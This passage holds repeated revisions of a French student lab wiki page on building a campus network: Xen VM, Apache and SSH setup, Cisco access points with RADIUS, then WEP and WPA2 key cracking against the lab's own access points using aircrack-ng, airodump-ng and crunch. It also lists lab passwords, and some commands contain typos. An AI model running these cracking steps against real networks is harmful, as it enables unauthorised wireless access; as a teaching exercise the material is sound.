aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme on a plusieurs utilisateurs, il faut creer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-21T18:04:56Z

Jcabrald : /* Démarrage/Arrêt/Redémarrage de la machine virtuelle */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Configuration des points d'accès Wi-Fi==

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un utilisateur :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme on a plusieurs utilisateurs, il faut creer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-18T17:02:58Z

Jcabrald : /* Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root vers "glopglop', utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Configuration des points d'accès Wi-Fi==

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un utilisateur :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme on a plusieurs utilisateurs, il faut creer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

Fichier:Archi reseau 2.png

2019-11-18T17:02:30Z

Jcabrald : Architecture générale du réseau

Architecture générale du réseau

TP sysres IMA2a5 2019/2020 G6

2019-11-18T16:49:10Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau17112018.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root vers "glopglop', utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Configuration des points d'accès Wi-Fi==

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un utilisateur :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme on a plusieurs utilisateurs, il faut creer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

